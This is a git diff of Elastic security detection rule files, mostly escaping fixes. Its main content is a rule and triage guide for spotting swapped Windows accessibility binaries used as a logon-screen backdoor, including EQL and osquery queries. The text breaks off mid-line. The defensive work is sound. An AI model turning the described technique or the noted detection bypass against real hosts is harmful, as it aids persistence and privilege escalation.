 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -97,7 +97,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json
index 1c7a7e5fe71..90783d297de 100644
--- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_107.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Modification of Accessibility Binaries",
- "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n",
 "references": [
 "https://www.elastic.co/blog/practical-security-engineering-stateful-detection"
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json
index c14b50e3e93..5043a12e906 100644
--- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Modification of Accessibility Binaries",
- "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service 
Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n",
 "references": [
 "https://www.elastic.co/blog/practical-security-engineering-stateful-detection"
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json
index 89436af2fa9..3cbe032a9b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json
index 7f19255c639..c91cfd9f279 100644
--- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json
index a741e20f5b8..aa4db8e0b96 100644
--- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json
index 4975d0334bb..faba9e77b3b 100644
--- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json
index 5b3a8d2c5a0..010a6298b7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json
index 52db3651908..c89b9bac07e 100644
--- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json
@@ -30,7 +30,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json
index c722b231110..ee4300ea92d 100644
--- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json
@@ -44,7 +44,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json
index 6e3730ac1bf..67ca88756d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json
index 1de6110e0ab..9611ad284d5 100644
--- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json
@@ -27,7 +27,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json
index 9bf3fa5f1f0..0f214e5247a 100644
--- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json
@@ -37,7 +37,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json
index 73db05ab465..abb4161d8fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Sysctl File Event",
- "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w 